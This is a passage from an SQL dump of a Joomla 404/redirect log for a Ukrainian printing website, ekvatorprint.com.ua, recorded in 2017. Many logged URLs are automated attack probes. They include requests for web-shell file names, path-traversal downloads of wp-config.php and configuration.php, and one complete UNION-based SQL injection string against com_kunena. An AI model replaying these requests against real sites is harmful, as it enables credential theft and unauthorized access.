00:00:00',301),(9167,'http://ekvatorprint.com.ua/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-27 08:34:17','0000-00-00 00:00:00',301),(9168,'http://ekvatorprint.com.ua/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=1',NULL,'http://www.google.com/','',1,0,'2017-03-27 10:54:33','0000-00-00 00:00:00',301),(9169,'http://ekvatorprint.com.ua/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=1',NULL,'http://www.google.com/','',1,0,'2017-03-27 13:14:30','0000-00-00 00:00:00',301),(9170,'http://ekvatorprint.com.ua/media/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/media/logo_img.php.suspected','',6,0,'2017-03-27 17:12:07','0000-00-00 00:00:00',301),(9171,'http://ekvatorprint.com.ua/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=1',NULL,'http://www.google.com/','',1,0,'2017-03-27 17:55:57','0000-00-00 00:00:00',301),(9172,'http://ekvatorprint.com.ua/index.php?option=com_joomblog&task=tag&tag=asdadsa1',NULL,'http://www.google.com/','',1,0,'2017-03-27 20:16:34','0000-00-00 00:00:00',301),(9173,'http://ekvatorprint.com.ua/index.php?option=com_jegallery&view=photo_detail&photo_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-28 07:38:46','0000-00-00 00:00:00',301),(9174,'http://ekvatorprint.com.ua/index.php?option=com_jeformcr&view=form&Itemid=1',NULL,'http://www.google.com/','',1,0,'2017-03-28 10:00:02','0000-00-00 00:00:00',301),(9175,'http://ekvatorprint.com.ua/wp-content/plugins/analytic/readme.txt',NULL,'','',1,0,'2017-03-29 21:45:55','0000-00-00 00:00:00',301),(9176,'http://ekvatorprint.com.ua/webconfig.txt.php.suspected',NULL,'http://ekvatorprint.com.ua/webconfig.txt.php.suspected','',1,0,'2017-03-29 22:35:50','0000-00-00 00:00:00',301),(9177,'http://ekvatorprint.com.ua/configurationbak.php.suspected',NULL,'http://ekvatorprint.com.ua/configurationbak.php.suspected','',1,0,'2017-03-30 00:40:43','0000-00-00 00:00:00',301),(9178,'http://ekvatorprint.com.ua/index.php?option=com_gnosis&view=tags&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-30 01:04:03','0000-00-00 00:00:00',301),(9179,'http://ekvatorprint.com.ua/index.php?option=com_recipe&view=recipes&task=print_ingred&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-30 03:25:16','0000-00-00 00:00:00',301),(9180,'http://ekvatorprint.com.ua/index.php?option=com_coupon&view=coupons&catid=1',NULL,'http://www.google.com/','',1,0,'2017-03-30 05:46:50','0000-00-00 00:00:00',301),(9181,'http://ekvatorprint.com.ua/index.php?option=com_coupon&view=coupons&storeid=1',NULL,'http://www.google.com/','',1,0,'2017-03-30 08:07:37','0000-00-00 00:00:00',301),(9182,'http://ekvatorprint.com.ua/index.php/en/?option=com_vikrentcar&caropt=1&days=31&pickup=1490947200&release=1493542800&place=1&task=showprc&Itemid=104',NULL,'http://www.google.com/','',1,0,'2017-03-30 16:01:28','0000-00-00 00:00:00',301),(9183,'http://ekvatorprint.com.ua/index.php/en/?option=com_vikrentitems&task=showprc&itemopt=1&days=2&pickup=1490790600&release=1490947200&place=1&Itemid=132',NULL,'http://www.google.com/','',1,0,'2017-03-30 18:24:33','0000-00-00 00:00:00',301),(9184,'http://ekvatorprint.com.ua/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=1&filters[service]=1&filters[country]=1&filters[state]=1',NULL,'http://www.google.com/','',1,0,'2017-03-30 20:45:28','0000-00-00 00:00:00',301),(9185,'http://ekvatorprint.com.ua//plus/img/wbg.gif',NULL,'','',1,0,'2017-03-31 13:38:17','0000-00-00 00:00:00',301),(9186,'http://ekvatorprint.com.ua/index.php?option=com_opencart&route=product/product&product_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-31 14:03:22','0000-00-00 00:00:00',301),(9187,'http://ekvatorprint.com.ua/index.php?option=com_extrasearch&controller=createusers&establename=1',NULL,'http://www.google.com/','',1,0,'2017-03-31 19:37:38','0000-00-00 00:00:00',301),(9188,'http://ekvatorprint.com.ua/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes',NULL,'','',1,0,'2017-03-31 21:09:28','0000-00-00 00:00:00',301),(9189,'http://ekvatorprint.com.ua/wp-content/plugins/stats-wp/readme.txt',NULL,'','',5,0,'2017-04-03 14:15:58','0000-00-00 00:00:00',301),(9190,'http://ekvatorprint.com.ua/templates/platonic/index.php',NULL,'','',1,0,'2017-04-03 17:56:58','0000-00-00 00:00:00',301),(9191,'http://ekvatorprint.com.ua/templates/yoo_royalplaza/index.php',NULL,'','',1,0,'2017-04-03 17:56:59','0000-00-00 00:00:00',301),(9192,'http://ekvatorprint.com.ua/internet.-katalog-modulnykh-kartin',NULL,'','',1,0,'2017-04-05 01:07:53','0000-00-00 00:00:00',301),(9193,'http://ekvatorprint.com.ua/print-phot',NULL,'','',1,0,'2017-04-05 09:59:26','0000-00-00 00:00:00',301),(9194,'http://ekvatorprint.com.ua/print-p',NULL,'','',1,0,'2017-04-05 09:59:26','0000-00-00 00:00:00',301),(9195,'http://ekvatorprint.com.ua/print-',NULL,'','',12,0,'2017-04-05 09:59:26','0000-00-00 00:00:00',301),(9196,'http://ekvatorprint.com.ua/print-pho',NULL,'','',1,0,'2017-04-05 09:59:27','0000-00-00 00:00:00',301),(9197,'http://ekvatorprint.com.ua/print-ph',NULL,'','',1,0,'2017-04-05 09:59:27','0000-00-00 00:00:00',301),(9198,'http://ekvatorprint.com.ua/prin',NULL,'','',1,0,'2017-04-05 09:59:28','0000-00-00 00:00:00',301),(9199,'http://ekvatorprint.com.ua/pri',NULL,'','',5,0,'2017-04-05 09:59:28','0000-00-00 00:00:00',301),(9200,'http://ekvatorprint.com.ua/g;m.parentNode.insertBefore(a,m)',NULL,'http://ekvatorprint.com.ua','',3,0,'2017-04-09 07:06:54','0000-00-00 00:00:00',301),(9201,'http://ekvatorprint.com.ua/printing-on-canvasприват 24',NULL,'','',1,0,'2017-04-09 18:22:45','0000-00-00 00:00:00',301),(9202,'http://ekvatorprint.com.ua/.svn/wc.db',NULL,'','',4,0,'2017-04-09 22:01:34','0000-00-00 00:00:00',301),(9203,'http://ekvatorprint.com.ua/index.php?option=com_blog_calendar&modid=1',NULL,'http://www.google.com/','',1,0,'2017-04-11 10:42:46','0000-00-00 00:00:00',301),(9204,'http://ekvatorprint.com.ua/wp-api.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-04-11 11:03:20','0000-00-00 00:00:00',301),(9205,'http://ekvatorprint.com.ua/media/version.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-04-11 11:05:48','0000-00-00 00:00:00',301),(9206,'http://ekvatorprint.com.ua/assets/images/version.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-04-11 11:07:36','0000-00-00 00:00:00',301),(9207,'http://ekvatorprint.com.ua/admin/language/english/total/arhive.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-04-11 11:07:41','0000-00-00 00:00:00',301),(9208,'http://ekvatorprint.com.ua/wp-content/uploads/cmsbuild.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-04-11 11:09:33','0000-00-00 00:00:00',301),(9209,'http://ekvatorprint.com.ua/cmsbuild.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-04-11 11:10:59','0000-00-00 00:00:00',301),(9210,'http://ekvatorprint.com.ua/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=1&lang=en',NULL,'http://www.google.com/','',1,0,'2017-04-11 13:26:20','0000-00-00 00:00:00',301),(9211,'http://ekvatorprint.com.ua/index.php?option=com_publisher&view=issues&Itemid=1&lang=en',NULL,'http://www.google.com/','',1,0,'2017-04-11 16:11:50','0000-00-00 00:00:00',301),(9212,'http://ekvatorprint.com.ua/component/enmasse/term?tmpl=component&id=1',NULL,'http://www.google.com/','',1,0,'2017-04-11 21:39:31','0000-00-00 00:00:00',301),(9213,'http://ekvatorprint.com.ua/index.php?option=com_jeauto&view=item_detail&d_itemid=1',NULL,'http://www.google.com/','',1,0,'2017-04-12 05:50:34','0000-00-00 00:00:00',301),(9214,'http://ekvatorprint.com.ua/index.php?option=com_jux_eventon&view=event&id=1',NULL,'http://www.google.com/','',3,0,'2017-04-12 09:57:23','0000-00-00 00:00:00',301),(9215,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:13','0000-00-00 00:00:00',301),(9216,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:14','0000-00-00 00:00:00',301),(9217,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:14','0000-00-00 00:00:00',301),(9218,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:15','0000-00-00 00:00:00',301),(9219,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:16','0000-00-00 00:00:00',301),(9220,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:16','0000-00-00 00:00:00',301),(9221,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:17','0000-00-00 00:00:00',301),(9222,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:17','0000-00-00 00:00:00',301),(9223,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:18','0000-00-00 00:00:00',301),(9224,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:18','0000-00-00 00:00:00',301),(9225,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:18','0000-00-00 00:00:00',301),(9226,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:19','0000-00-00 00:00:00',301),(9227,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:19','0000-00-00 00:00:00',301),(9228,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:19','0000-00-00 00:00:00',301),(9229,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:20','0000-00-00 00:00:00',301),(9230,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2017-04-13 20:50:20','0000-00-00 00:00:00',301),(9231,'http://ekvatorprint.com.ua/wiki5/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:06','0000-00-00 00:00:00',301),(9232,'http://ekvatorprint.com.ua/main/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:07','0000-00-00 00:00:00',301),(9233,'http://ekvatorprint.com.ua/tiki/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:07','0000-00-00 00:00:00',301),(9234,'http://ekvatorprint.com.ua/tiki2/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:07','0000-00-00 00:00:00',301),(9235,'http://ekvatorprint.com.ua/ee/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:09','0000-00-00 00:00:00',301),(9236,'http://ekvatorprint.com.ua/5/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:09','0000-00-00 00:00:00',301),(9237,'http://ekvatorprint.com.ua/twc/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:09','0000-00-00 00:00:00',301),(9238,'http://ekvatorprint.com.ua/tw/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:10','0000-00-00 00:00:00',301),(9239,'http://ekvatorprint.com.ua/REM_EDX/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:10','0000-00-00 00:00:00',301),(9240,'http://ekvatorprint.com.ua/tat/tiki-calendar.php',NULL,'','',1,0,'2017-04-16 13:19:11','0000-00-00 00:00:00',301),(9241,'http://ekvatorprint.com.ua/wp-content/plugins/Login-wall-OaWAc/login_wall.php?login=cmd',NULL,'','',1,0,'2017-04-18 02:04:31','0000-00-00 00:00:00',301),(9242,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'','',1,0,'2017-04-18 02:04:31','0000-00-00 00:00:00',301),(9243,'http://ekvatorprint.com.ua/wp-content/themes/standard/404.php',NULL,'','',1,0,'2017-04-18 02:04:31','0000-00-00 00:00:00',301),(9244,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/images/tipsy.gif',NULL,'','',1,0,'2017-04-18 02:04:32','0000-00-00 00:00:00',301),(9245,'http://ekvatorprint.com.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2017-04-18 02:04:32','0000-00-00 00:00:00',301),(9246,'http://ekvatorprint.com.ua/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php',NULL,'','',1,0,'2017-04-18 02:04:32','0000-00-00 00:00:00',301),(9247,'http://ekvatorprint.com.ua/wp-config.orig',NULL,'','',1,0,'2017-04-18 02:04:34','0000-00-00 00:00:00',301),(9248,'http://ekvatorprint.com.ua/64cfdb6127efbfd7e16fbfbb3505d3be',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2017-04-18 07:57:22','0000-00-00 00:00:00',301),(9249,'http://ekvatorprint.com.ua/images/article-expand.png',NULL,'http://ekvatorprint.com.ua/contacts','',1,0,'2017-04-19 08:18:12','0000-00-00 00:00:00',301),(9250,'http://ekvatorprint.com.ua/images/article-contract.png',NULL,'http://ekvatorprint.com.ua/contacts','',1,0,'2017-04-19 08:18:12','0000-00-00 00:00:00',301),(9251,'http://ekvatorprint.com.ua/images/tooltip_arrow.png',NULL,'http://ekvatorprint.com.ua/contacts','',1,0,'2017-04-19 08:18:12','0000-00-00 00:00:00',301),(9252,'http://ekvatorprint.com.ua/wp-temporary.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-04-19 12:01:55','0000-00-00 00:00:00',301),(9253,'http://ekvatorprint.com.ua/wp-help.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-04-19 12:06:07','0000-00-00 00:00:00',301),(9254,'http://ekvatorprint.com.ua/components/com_ajax/ajax.lib.php',NULL,'http://ekvatorprint.com.ua/components/com_ajax/ajax.lib.php','',8,0,'2017-04-22 19:03:41','0000-00-00 00:00:00',301),(9255,'http://ekvatorprint.com.ua/libraries/f0f/platform/filesystem/forms.php?component',NULL,'http://ekvatorprint.com.ua/libraries/f0f/platform/filesystem/forms.php?component','',5,0,'2017-04-22 19:04:34','0000-00-00 00:00:00',301),(9256,'http://ekvatorprint.com.ua/libraries/fof/include.lib.php',NULL,'http://ekvatorprint.com.ua/libraries/fof/include.lib.php','',5,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9257,'http://ekvatorprint.com.ua/templates/system/print.php?error',NULL,'http://ekvatorprint.com.ua/templates/system/print.php?error','',5,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9258,'http://ekvatorprint.com.ua/plugins/content/mysql/config.php',NULL,'http://ekvatorprint.com.ua/plugins/content/mysql/config.php','',4,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9259,'http://ekvatorprint.com.ua/modules/mod_articles_news/tmpl/data.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_news/tmpl/data.php','',5,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9260,'http://ekvatorprint.com.ua/templates/view/html/layouts/joomla/content/default.php?compact',NULL,'http://ekvatorprint.com.ua/templates/view/html/layouts/joomla/content/default.php?compact','',5,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9261,'http://ekvatorprint.com.ua/libraries/joomla/caches.php?ina',NULL,'http://ekvatorprint.com.ua/libraries/joomla/caches.php?ina','',5,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9262,'http://ekvatorprint.com.ua/libraries/joomla/application/data.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/application/data.php','',6,0,'2017-04-22 19:04:35','0000-00-00 00:00:00',301),(9263,'http://ekvatorprint.com.ua/libraries/joomla/extended.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/extended.php','',2,0,'2017-04-22 20:44:13','0000-00-00 00:00:00',301),(9264,'http://ekvatorprint.com.ua/mambots/editors-xtd/read.php',NULL,'http://ekvatorprint.com.ua/mambots/editors-xtd/read.php','',1,0,'2017-04-22 20:44:14','0000-00-00 00:00:00',301),(9265,'http://ekvatorprint.com.ua/libraries/fof/model/behavior/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/fof/model/behavior/backup.php','',1,0,'2017-04-22 20:44:14','0000-00-00 00:00:00',301),(9266,'http://ekvatorprint.com.ua/images/shop_image/product/config.php',NULL,'http://ekvatorprint.com.ua/images/shop_image/product/config.php','',1,0,'2017-04-22 20:44:15','0000-00-00 00:00:00',301),(9267,'http://ekvatorprint.com.ua/images/web-info.php',NULL,'http://ekvatorprint.com.ua/images/web-info.php','',3,0,'2017-04-22 20:44:15','0000-00-00 00:00:00',301),(9268,'http://ekvatorprint.com.ua/components/com_users/views/registration/old_e1c.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/registration/old_e1c.php','',1,0,'2017-04-22 20:44:15','0000-00-00 00:00:00',301),(9269,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/system_ml.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/system_ml.php.suspected','',1,0,'2017-04-22 20:44:17','0000-00-00 00:00:00',301),(9270,'http://ekvatorprint.com.ua/plugins/vmpayment/moneybookers_idl/language/backup.php',NULL,'http://ekvatorprint.com.ua/plugins/vmpayment/moneybookers_idl/language/backup.php','',1,0,'2017-04-22 20:44:17','0000-00-00 00:00:00',301),(9271,'http://ekvatorprint.com.ua/seminarios/aws.php',NULL,'http://ekvatorprint.com.ua/seminarios/aws.php','',1,0,'2017-04-22 20:44:17','0000-00-00 00:00:00',301),(9272,'http://ekvatorprint.com.ua/wmfgqbj.php',NULL,'http://ekvatorprint.com.ua/wmfgqbj.php','',1,0,'2017-04-22 20:44:32','0000-00-00 00:00:00',301),(9273,'http://ekvatorprint.com.ua/templates/tcvn_alevel/language/en-gb/backup.php',NULL,'http://ekvatorprint.com.ua/templates/tcvn_alevel/language/en-gb/backup.php','',1,0,'2017-04-22 20:44:33','0000-00-00 00:00:00',301),(9274,'http://ekvatorprint.com.ua/templates/beez/html/com_user/remind/remind.php',NULL,'http://ekvatorprint.com.ua/templates/beez/html/com_user/remind/remind.php','',1,0,'2017-04-22 20:44:33','0000-00-00 00:00:00',301),(9275,'http://ekvatorprint.com.ua/tmp/mfiuha.php',NULL,'http://ekvatorprint.com.ua/tmp/mfiuha.php','',1,0,'2017-04-22 20:44:33','0000-00-00 00:00:00',301),(9276,'http://ekvatorprint.com.ua/tmp/aws.php',NULL,'http://ekvatorprint.com.ua/tmp/aws.php','',1,0,'2017-04-22 20:44:33','0000-00-00 00:00:00',301),(9277,'http://ekvatorprint.com.ua/tmp/bsvi9.php',NULL,'http://ekvatorprint.com.ua/tmp/bsvi9.php','',1,0,'2017-04-22 20:44:34','0000-00-00 00:00:00',301),(9278,'http://ekvatorprint.com.ua/printing-on-canvas/trackback/',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',3,0,'2017-04-22 22:57:26','0000-00-00 00:00:00',301),(9279,'http://ekvatorprint.com.ua/contacts&quot;https:/api-maps.yandex.ru/2.1.47/build/release/images/util_cursor_storage_grab.cur&quot;',NULL,'','',2,0,'2017-04-24 12:27:57','0000-00-00 00:00:00',301),(9280,'http://ekvatorprint.com.ua/templates/att.php',NULL,'','',1,0,'2017-04-24 21:27:51','0000-00-00 00:00:00',301),(9281,'http://ekvatorprint.com.ua/templates/class.php',NULL,'','',1,0,'2017-04-24 21:27:52','0000-00-00 00:00:00',301),(9282,'http://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=%\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453 -- ;',NULL,'http://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=%25\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453%20--%20;','',1,0,'2017-04-25 11:45:26','0000-00-00 00:00:00',301),(9283,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',6,0,'2017-04-28 02:00:25','0000-00-00 00:00:00',301),(9284,'http://ekvatorprint.com.ua/ewebeditor/admin/login.asp',NULL,'','',3,0,'2017-04-28 02:00:25','0000-00-00 00:00:00',301),(9285,'http://ekvatorprint.com.ua/utility/convert/data/config.inc.php',NULL,'','',3,0,'2017-04-28 02:00:25','0000-00-00 00:00:00',301),(9286,'http://ekvatorprint.com.ua/shopadmin/index.php',NULL,'','',6,0,'2017-04-28 02:00:25','0000-00-00 00:00:00',301),(9287,'http://ekvatorprint.com.ua/admin_aspcms/login.asp',NULL,'','',5,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9288,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',4,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9289,'http://ekvatorprint.com.ua/dede/login.php',NULL,'','',5,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9290,'http://ekvatorprint.com.ua/ewebeditor/admin_login.asp',NULL,'','',3,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9291,'http://ekvatorprint.com.ua/system/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',2,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9292,'http://ekvatorprint.com.ua/admin/login.asp',NULL,'','',3,0,'2017-04-28 02:00:26','0000-00-00 00:00:00',301),(9293,'http://ekvatorprint.com.ua/equipment/wp-login.php',NULL,'http://ekvatorprint.com.ua/equipment/wp-login.php','',2,0,'2017-04-28 22:29:09','0000-00-00 00:00:00',301),(9294,'http://ekvatorprint.com.ua/index.php?option=com_contact\'A=0&view=contact&id=1&Itemid=5',NULL,'http://ekvatorprint.com.ua/index.php?option=com_contact\'A=0&view=contact&id=1&Itemid=5','',1,0,'2017-04-30 06:10:50','0000-00-00 00:00:00',301),(9295,'http://ekvatorprint.com.ua/index.php?option=com_contact&view=contact\'A=0&id=1&Itemid=5',NULL,'http://ekvatorprint.com.ua/index.php?option=com_contact&view=contact\'A=0&id=1&Itemid=5','',1,0,'2017-04-30 06:10:51','0000-00-00 00:00:00',301),(9296,'http://ekvatorprint.com.ua/plus/90sec.php',NULL,'http://ekvatorprint.com.ua/plus/90sec.php','',2,0,'2017-05-01 00:12:57','0000-00-00 00:00:00',301),(9297,'http://ekvatorprint.com.ua/administrator/bn.php',NULL,'http://ekvatorprint.com.ua/administrator/bn.php','',1,0,'2017-05-01 19:59:11','0000-00-00 00:00:00',301),(9298,'http://ekvatorprint.com.ua/administrator/components/com_config/views/application/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_config/views/application/thumbs.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9299,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/sys.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/sys.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9300,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/multilangstatus/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/multilangstatus/thumbs.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9301,'http://ekvatorprint.com.ua/administrator/components/com_redirect/views/link/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_redirect/views/link/thumbs.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9302,'http://ekvatorprint.com.ua/administrator/components/com_media/views/imageslist/sys.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_media/views/imageslist/sys.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9303,'http://ekvatorprint.com.ua/administrator/components/com_users/models/fields/sys.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/models/fields/sys.php','',1,0,'2017-05-01 19:59:38','0000-00-00 00:00:00',301),(9304,'http://ekvatorprint.com.ua/administrator/templates/hathor/mod_enrola.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/mod_enrola.php','',1,0,'2017-05-01 20:00:08','0000-00-00 00:00:00',301),(9305,'http://ekvatorprint.com.ua/administrator/online.php',NULL,'http://ekvatorprint.com.ua/administrator/online.php','',1,0,'2017-05-01 20:00:09','0000-00-00 00:00:00',301),(9306,'http://ekvatorprint.com.ua/administrator/mod_enrola.php',NULL,'http://ekvatorprint.com.ua/administrator/mod_enrola.php','',1,0,'2017-05-01 20:00:09','0000-00-00 00:00:00',301),(9307,'http://ekvatorprint.com.ua/administrator/includes/error_log.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/error_log.php','',1,0,'2017-05-01 20:00:09','0000-00-00 00:00:00',301),(9308,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/views/weblinks/sys.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/views/weblinks/sys.php','',1,0,'2017-05-01 20:00:10','0000-00-00 00:00:00',301),(9309,'http://ekvatorprint.com.ua/administrator/components/com_users/views/users/sys.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/views/users/sys.php','',1,0,'2017-05-01 20:00:10','0000-00-00 00:00:00',301),(9310,'http://ekvatorprint.com.ua/administrator/includes/dispacher.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/dispacher.php','',1,0,'2017-05-01 20:00:10','0000-00-00 00:00:00',301),(9311,'http://ekvatorprint.com.ua/components/com_adsmanager/font/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_adsmanager/font/sys.php','',1,0,'2017-05-01 20:00:30','0000-00-00 00:00:00',301),(9312,'http://ekvatorprint.com.ua/components/com_acepolls/models/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_acepolls/models/sys.php','',1,0,'2017-05-01 20:00:31','0000-00-00 00:00:00',301),(9313,'http://ekvatorprint.com.ua/components/com_content/page.php',NULL,'http://ekvatorprint.com.ua/components/com_content/page.php','',1,0,'2017-05-01 20:00:51','0000-00-00 00:00:00',301),(9314,'http://ekvatorprint.com.ua/components/com_media/dispacher.php',NULL,'http://ekvatorprint.com.ua/components/com_media/dispacher.php','',1,0,'2017-05-01 20:00:52','0000-00-00 00:00:00',301),(9315,'http://ekvatorprint.com.ua/components/com_fabrik/models/element.php',NULL,'http://ekvatorprint.com.ua/components/com_fabrik/models/element.php','',1,0,'2017-05-01 20:00:52','0000-00-00 00:00:00',301),(9316,'http://ekvatorprint.com.ua/images/class-wp-upgrade-cor1.php',NULL,'http://ekvatorprint.com.ua/images/class-wp-upgrade-cor1.php','',1,0,'2017-05-01 20:01:15','0000-00-00 00:00:00',301),(9317,'http://ekvatorprint.com.ua/components/secure.php',NULL,'http://ekvatorprint.com.ua/components/secure.php','',1,0,'2017-05-01 20:01:16','0000-00-00 00:00:00',301),(9318,'http://ekvatorprint.com.ua/images/cwebschelcc.php',NULL,'http://ekvatorprint.com.ua/images/cwebschelcc.php','',1,0,'2017-05-01 20:01:41','0000-00-00 00:00:00',301),(9319,'http://ekvatorprint.com.ua/images/fix.php',NULL,'http://ekvatorprint.com.ua/images/fix.php','',2,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9320,'http://ekvatorprint.com.ua/images/class.php',NULL,'http://ekvatorprint.com.ua/images/class.php','',1,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9321,'http://ekvatorprint.com.ua/images/eset.php',NULL,'http://ekvatorprint.com.ua/images/eset.php','',1,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9322,'http://ekvatorprint.com.ua/images/dr_xsystem.php',NULL,'http://ekvatorprint.com.ua/images/dr_xsystem.php','',1,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9323,'http://ekvatorprint.com.ua/images/data2.php',NULL,'http://ekvatorprint.com.ua/images/data2.php','',1,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9324,'http://ekvatorprint.com.ua/images/configcs.php',NULL,'http://ekvatorprint.com.ua/images/configcs.php','',1,0,'2017-05-01 20:01:42','0000-00-00 00:00:00',301),(9325,'http://ekvatorprint.com.ua/images/mds.php',NULL,'http://ekvatorprint.com.ua/images/mds.php','',1,0,'2017-05-01 20:02:06','0000-00-00 00:00:00',301),(9326,'http://ekvatorprint.com.ua/images/plegmain.php',NULL,'http://ekvatorprint.com.ua/images/plegmain.php','',1,0,'2017-05-01 20:02:06','0000-00-00 